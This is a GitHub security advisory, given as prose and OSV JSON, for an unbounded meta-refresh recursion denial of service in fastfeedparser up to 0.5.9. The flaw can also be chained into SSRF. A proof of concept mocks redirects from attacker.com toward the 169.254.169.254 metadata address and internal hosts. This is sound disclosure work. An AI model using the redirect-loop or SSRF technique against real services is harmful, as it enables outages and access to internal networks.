GHSA-4GX2-PC4F-WQ37
Vulnerability from github – Published: 2026-04-08 00:12 – Updated: 2026-04-08 00:12Summary
When parse() fetches a URL that returns an HTML page containing a <meta http-equiv="refresh"> tag, it recursively calls itself with the redirect URL — with no depth limit, no visited-URL deduplication, and no redirect count cap. An attacker-controlled server that returns an infinite chain of HTML meta-refresh responses causes unbounded recursion, exhausting the Python call stack and crashing the process. This vulnerability can also be chained with the companion SSRF issue to reach internal network targets after bypassing the initial URL check.
Details
parse() catches ValueError on XML parse failure, extracts a meta-refresh URL from the HTML response via _extract_meta_refresh_url(), and tail-calls itself with that URL. The recursive call is unconditional — there is no maximum redirect depth, no set of already-visited URLs, and no guard against self-referential or looping redirects.
fastfeedparser/main.py — parse() (recursive sink):
def parse(source: str | bytes, ...) -> FastFeedParserDict:
is_url = isinstance(source, str) and source.startswith(("http://", "https://"))
if is_url:
content = _fetch_url_content(source)
try:
return _parse_content(content, ...)
except ValueError as e:
...
redirect_url = _extract_meta_refresh_url(content, source)
if redirect_url is None:
raise
return parse(redirect_url, ...) # ← unconditional recursion, no depth limit
_extract_meta_refresh_url() uses urljoin(base_url, match.group(1)) so relative, protocol-relative (//host/path), and absolute URLs in the content= attribute are all followed.
PoC
No live server required. The following monkeypatches _fetch_url_content to return an infinite HTML meta-refresh chain and confirms unbounded recursion:
import fastfeedparser.main as m
call_count = 0
_orig = m._fetch_url_content
def mock_fetch(url):
global call_count
call_count += 1
if call_count > 10:
raise RuntimeError(f"Stopped at call {call_count}")
next_url = f"http://169.254.169.254/step{call_count}/"
return f"""<html><head>
<meta http-equiv="refresh" content="0; url={next_url}">
</head><body>not a feed</body></html>""".encode()
m._fetch_url_content = mock_fetch
try:
m.parse("http://attacker.com/loop")
except RuntimeError as e:
print(f"CONFIRMED infinite loop: {e}")
finally:
m._fetch_url_content = _orig
print(f"Total fetches before stop: {call_count}")
# Output:
# CONFIRMED infinite loop: Stopped at call 11
# Total fetches before stop: 11
Each recursive call performs a real HTTP request (30 s timeout), HTML parsing, and a Python stack frame allocation. With Python's default recursion limit of 1000 and a 30 s per-request timeout, a single attacker request can hold a server thread busy for up to ~8 hours before a RecursionError is raised.
SSRF chain variant: The first response can be legitimate HTML redirecting to an internal address (http://192.168.1.1/), letting the redirect loop also serve as an SSRF bypass for targets that would otherwise be blocked by application-level URL validation applied only to the initial URL.
Impact
This is a denial-of-service vulnerability with a secondary SSRF-chaining impact. Any application that accepts user-supplied feed URLs and calls fastfeedparser.parse() is affected — including RSS aggregators, feed preview services, and "subscribe by URL" features. An attacker with no authentication can:
- Hold a server worker thread indefinitely (one request per attacker connection)
- Crash the worker process via
RecursionErrorafter ~1000 redirects - Use the redirect chain to pivot SSRF requests to internal network targets
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.5.9"
},
"package": {
"ecosystem": "PyPI",
"name": "fastfeedparser"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.5.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-39376"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-674"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-08T00:12:26Z",
"nvd_published_at": "2026-04-07T20:16:32Z",
"severity": "HIGH"
},
"details": "### Summary\nWhen `parse()` fetches a URL that returns an HTML page containing a `\u003cmeta http-equiv=\"refresh\"\u003e` tag, it recursively calls itself with the redirect URL \u2014 with no depth limit, no visited-URL deduplication, and no redirect count cap. An attacker-controlled server that returns an infinite chain of HTML meta-refresh responses causes unbounded recursion, exhausting the Python call stack and crashing the process. This vulnerability can also be chained with the companion SSRF issue to reach internal network targets after bypassing the initial URL check.\n\n\n### Details\n`parse()` catches `ValueError` on XML parse failure, extracts a meta-refresh URL from the HTML response via `_extract_meta_refresh_url()`, and tail-calls itself with that URL. The recursive call is unconditional \u2014 there is no maximum redirect depth, no set of already-visited URLs, and no guard against self-referential or looping redirects.\n\n**`fastfeedparser/main.py` \u2014 `parse()` (recursive sink):**\n```python\ndef parse(source: str | bytes, ...) -\u003e FastFeedParserDict:\n is_url = isinstance(source, str) and source.startswith((\"http://\", \"https://\"))\n if is_url:\n content = _fetch_url_content(source)\n try:\n return _parse_content(content, ...)\n except ValueError as e:\n ...\n redirect_url = _extract_meta_refresh_url(content, source)\n if redirect_url is None:\n raise\n return parse(redirect_url, ...) # \u2190 unconditional recursion, no depth limit\n```\n\n`_extract_meta_refresh_url()` uses `urljoin(base_url, match.group(1))` so relative, protocol-relative (`//host/path`), and absolute URLs in the `content=` attribute are all followed.\n\n### PoC\nNo live server required. The following monkeypatches `_fetch_url_content` to return an infinite HTML meta-refresh chain and confirms unbounded recursion:\n\n```python\nimport fastfeedparser.main as m\n\ncall_count = 0\n_orig = m._fetch_url_content\n\ndef mock_fetch(url):\n global call_count\n call_count += 1\n if call_count \u003e 10:\n raise RuntimeError(f\"Stopped at call {call_count}\")\n next_url = f\"http://169.254.169.254/step{call_count}/\"\n return f\"\"\"\u003chtml\u003e\u003chead\u003e\n\u003cmeta http-equiv=\"refresh\" content=\"0; url={next_url}\"\u003e\n\u003c/head\u003e\u003cbody\u003enot a feed\u003c/body\u003e\u003c/html\u003e\"\"\".encode()\n\nm._fetch_url_content = mock_fetch\n\ntry:\n m.parse(\"http://attacker.com/loop\")\nexcept RuntimeError as e:\n print(f\"CONFIRMED infinite loop: {e}\")\nfinally:\n m._fetch_url_content = _orig\n print(f\"Total fetches before stop: {call_count}\")\n\n# Output:\n# CONFIRMED infinite loop: Stopped at call 11\n# Total fetches before stop: 11\n```\n\nEach recursive call performs a real HTTP request (30 s timeout), HTML parsing, and a Python stack frame allocation. With Python\u0027s default recursion limit of 1000 and a 30 s per-request timeout, a single attacker request can hold a server thread busy for up to ~8 hours before a `RecursionError` is raised.\n\n**SSRF chain variant:** The first response can be legitimate HTML redirecting to an internal address (`http://192.168.1.1/`), letting the redirect loop also serve as an SSRF bypass for targets that would otherwise be blocked by application-level URL validation applied only to the initial URL.\n\n\n\n### Impact\nThis is a denial-of-service vulnerability with a secondary SSRF-chaining impact. Any application that accepts user-supplied feed URLs and calls `fastfeedparser.parse()` is affected \u2014 including RSS aggregators, feed preview services, and \"subscribe by URL\" features. An attacker with no authentication can:\n\n- Hold a server worker thread indefinitely (one request per attacker connection)\n- Crash the worker process via `RecursionError` after ~1000 redirects\n- Use the redirect chain to pivot SSRF requests to internal network targets",
"id": "GHSA-4gx2-pc4f-wq37",
"modified": "2026-04-08T00:12:26Z",
"published": "2026-04-08T00:12:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kagisearch/fastfeedparser/security/advisories/GHSA-4gx2-pc4f-wq37"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39376"
},
{
"type": "PACKAGE",
"url": "https://github.com/kagisearch/fastfeedparser"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "FastFeedParser has an infinite redirect loop DoS via meta-refresh chain"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.